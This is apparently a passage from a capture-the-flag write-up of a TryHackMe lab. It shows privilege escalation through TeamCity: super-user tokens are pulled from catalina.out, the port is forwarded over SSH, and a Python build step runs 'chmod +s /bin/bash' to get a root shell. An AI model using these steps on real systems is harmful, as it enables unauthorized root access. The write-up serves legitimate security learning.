sys-internal@vulnnet-internal:/TeamCity$ cat  TeamCity-readme.txt
This is the JetBrains TeamCity home directory.

For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute:
* On Windows: `.\bin\teamcity-server.bat start`
* On Linux and macOS: `./bin/teamcity-server.sh start`
sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$

sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:58689                                 [::ffff:127.0.0.1]:8111                             
tcp  CLOSE-WAIT 1       0                          [::ffff:127.0.0.1]:39595                                 [::ffff:127.0.0.1]:8111                             
tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:8111                                  [::ffff:127.0.0.1]:58689                            
sys-internal@vulnnet-internal:/TeamCity$ 

I can set up an SSH port forwarding so I can access port 8111 on my localhost

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$ 

Now when I go to localhost:8111 I can connect to TeamCity and it is running version 2.2.

sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
grep: temp/jna-3506402: Permission denied
grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
grep: webapps/ROOT/plugins/coverage: Permission denied

logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)

sys-internal@vulnnet-internal:/TeamCity$ 

authentication token 8070510537629599387

I found several authentication tokens under logs/catalina.out. Using these, I can login. Poking around, I find I can create a new build.

First Creating a new build, I can run a build step and execute python. My first thought was to throw in a python reverse shell but this did not work. so, don't worry we have a 2nd solution.

Since TeamCity is running as root, whatever connection we can get it to spawn will be with root permissions, we immediately started to poke for console pages/terminal or anything that be used to run system commands

After a while we figured you can create a project then build configuration, skipping the question for “New VCS Root”,

After creating a build configuration
choose “Build Steps” on the left menu to add a build step,

Choose the runner type “Python”. Choose command as custom script

then place in the custom script section we write a some simple script..

I can change an SUID to elevate my privileges. Since bash is the easiest, I chose to do that.

import os

os.system("chmod +s /bin/bash")

After saving this build and running it, I go back to SSH session.

 Here, I see /bin/bash permissions have changed.

sys-internal@vulnnet-internal:/TeamCity$ 
sys-internal@vulnnet-internal:/TeamCity$ cd 
sys-internal@vulnnet-internal:~$ ls /bin/bash
/bin/bash
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ ls /bin/bash
/bin/bash
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ 

I can now elevate my privileges to root..

As root, I can read root.txt

sys-internal@vulnnet-internal:~$ 
sys-internal@vulnnet-internal:~$ cd /bin/bash
-bash: cd: /bin/bash: Not a directory
sys-internal@vulnnet-internal:~$ 
sys-internal@vulnnet-internal:~$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4# #kumaratuljaiswal.in
bash-4.4# 
bash-4.4# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
bash-4.4# 

Finally we won!! Thanks for supporting :-)

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)